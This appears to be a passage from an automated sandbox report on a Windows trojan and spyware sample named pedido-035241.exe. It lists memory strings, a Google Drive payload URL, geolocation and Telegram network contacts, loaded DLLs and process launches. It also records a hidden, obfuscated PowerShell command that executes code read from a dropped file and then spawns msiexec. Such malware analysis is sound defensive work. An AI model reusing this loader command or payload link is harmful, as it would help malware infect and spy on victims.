            Source: msiexec.exe, 00000006.00000002.2967421092.0000000008939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1azRJsiP2GO7H_gWywAD5t_ayrt5FpP0d&export=download?
            Source: msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000244B5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.000000002448E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.000000002441E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: msiexec.exe, 00000006.00000002.2981297005.000000002441E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: msiexec.exe, 00000006.00000002.2981297005.0000000024448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000244B5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.000000002448E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.0000000024448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: msiexec.exe, 00000006.00000003.2471471790.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002551E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002564D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025750000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254A9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: msiexec.exe, 00000006.00000002.2982840463.0000000025484000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002572B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025655000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025628000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002551E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002564D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025750000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254A9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: msiexec.exe, 00000006.00000002.2982840463.0000000025484000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002572B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025655000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025628000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: msiexec.exe, 00000006.00000003.2471471790.000000000894B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471471790.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: msiexec.exe, 00000006.00000003.2471471790.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: msiexec.exe, 00000006.00000003.2471471790.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: msiexec.exe, 00000006.00000003.2471471790.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: msiexec.exe, 00000006.00000003.2471471790.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000245C3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000245B4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000245BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
            Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
            Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
            Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
            Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.4:49778 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49784 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49880 version: TLS 1.2
            Source: C:\Users\user\Desktop\pedido-035241.exeCode function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056A8

            System Summary

            barindex
            Powershell drops PE file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene\pedido-035241.exeJump to dropped file
            Source: C:\Users\user\Desktop\pedido-035241.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
            Source: C:\Users\user\Desktop\pedido-035241.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeCode function: 0_2_00406BFE0_2_00406BFE
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02BED2786_2_02BED278
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02BE53626_2_02BE5362
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02BEC1466_2_02BEC146
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02BEC7386_2_02BEC738
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02BEC4686_2_02BEC468
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02BECA086_2_02BECA08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02BEE9886_2_02BEE988
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02BECFAA6_2_02BECFAA
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02BECCD86_2_02BECCD8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02BE71186_2_02BE7118
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02BE29E06_2_02BE29E0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02BEE97A6_2_02BEE97A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02BEF9616_2_02BEF961
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02BE9DE06_2_02BE9DE0
            Source: pedido-035241.exeStatic PE information: invalid certificate
            Source: pedido-035241.exe, 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebiddens lokalsamfund.exe4 vs pedido-035241.exe
            Source: pedido-035241.exeBinary or memory string: OriginalFilenamebiddens lokalsamfund.exe4 vs pedido-035241.exe
            Source: pedido-035241.exe.1.drBinary or memory string: OriginalFilenamebiddens lokalsamfund.exe4 vs pedido-035241.exe
            Source: pedido-035241.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/16@6/6
            Source: C:\Users\user\Desktop\pedido-035241.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
            Source: C:\Users\user\Desktop\pedido-035241.exeCode function: 0_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404954
            Source: C:\Users\user\Desktop\pedido-035241.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
            Source: C:\Users\user\Desktop\pedido-035241.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semitelic.iniJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
            Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
            Source: C:\Users\user\Desktop\pedido-035241.exeFile created: C:\Users\user\AppData\Local\Temp\nsu71F0.tmpJump to behavior
            Source: pedido-035241.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\pedido-035241.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeFile read: C:\Users\user\Desktop\pedido-035241.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\pedido-035241.exe "C:\Users\user\Desktop\pedido-035241.exe"
            Source: C:\Users\user\Desktop\pedido-035241.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) "
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\pedido-035241.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) "Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
